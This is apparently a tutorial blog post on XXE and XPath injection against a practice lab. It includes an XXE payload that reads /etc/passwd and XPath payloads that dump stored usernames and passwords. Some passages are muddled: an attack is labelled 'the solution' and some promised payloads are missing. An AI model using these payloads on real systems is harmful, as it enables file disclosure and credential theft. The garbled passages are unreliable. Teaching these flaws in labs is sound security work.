Hello friends how are you i hope you are doing good so here we are closing in on our this series i really hope that you have learned a lot or a little :p so if you did learned some thing do tell us by commenting and sharing. Here are other sections MySql Injection , Directory Traversal , File Include Attacks ,Unrestricted File Upload , Command Injection Attacks, LDAP Injection
XML eXternal Entity (XXE) attack:
External Entity: The set of valid entities can be extended by defining new entities. If the definition of an entity is a URI, the entity is called an external entity. Unless configured to do otherwise, external entities force the XML parser to access the resource specified by the URI, e.g., a file on the local machine or on a remote systems. This behavior exposes the application to XML eXternal Entity (XXE) attacks, which can be used to perform denial of service of the local system, gain unauthorized access to files on the local machine, scan remote machines, and perform denial of service of remote systems.
So What is the solution ??
Here is the solution and it is very simple.
Attacking payload (read system file: /etc/passwd):
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test>
PoC (with URL encoded):
In this example, the code uses the user’s input, inside an XPath expression. XPath is a query language, which selects nodes from an XML document. Imagine the XML document as a database, and XPath as an SQL query. If you can manipulate the query, you will be able to retrieve elements to which you normally should not have access.
If we inject a single quote, we can see the following error:
Warning: SimpleXMLElement::XPath(): Invalid predicate in /var/www/xml/example2.php on line 7 Warning: SimpleXMLElement::XPath(): xmlXPathEval: evaluation failed in /var/www/xml/example2.php on line 7 Warning: Variable passed to each() is not an array or object in /var/www/xml/example2.php on line 8
Just like SQL injection, XPath allows you to do boolean logic, and you can try:
' and '1'='1and you should get the same result.
' or '1'='0and you should get the same result.
' and '1'='0and you should not get any result.
' or '1'='1and you should get all results.
Based on these tests and previous knowledge of XPath, it’s possible to get an idea of what the XPath expression looks like:
[PARENT NODES]/name[.='[INPUT]']/[CHILD NODES]
To comment out the rest of the XPath expression, you can use a NULL BYTE (which you will need to encode as %00). As we can see in the XPath expression above, we also need to add a
] to properly complete the syntax. Our payload now looks like
hacker' or 1=1]%00 if we want all results).
If we try to find the child of the current node, using the payload
'%20or%201=1]/child::node()%00, we don’t get much information.
Here, the problem is that we need to got back up in the node hierarchy, to get more information. In XPath, this can be done using
parent::* as part of the payload. We can now select the parent of the current node, and display all the child node using
One of the node’s value looks like a password. We can confirm this, by checking if the node’s name is
password using the payload
In order to dump all the users’ credentials, I use the payload “‘ or 1=1]%00” to construct the variable $xpath as follows:
users/user/name[.='' or 1=1]%00']/parent::*/message
Here %00 will get rid of the following strings.
http://[yourlab]/xml/example2.php?name=' or 1=1]%00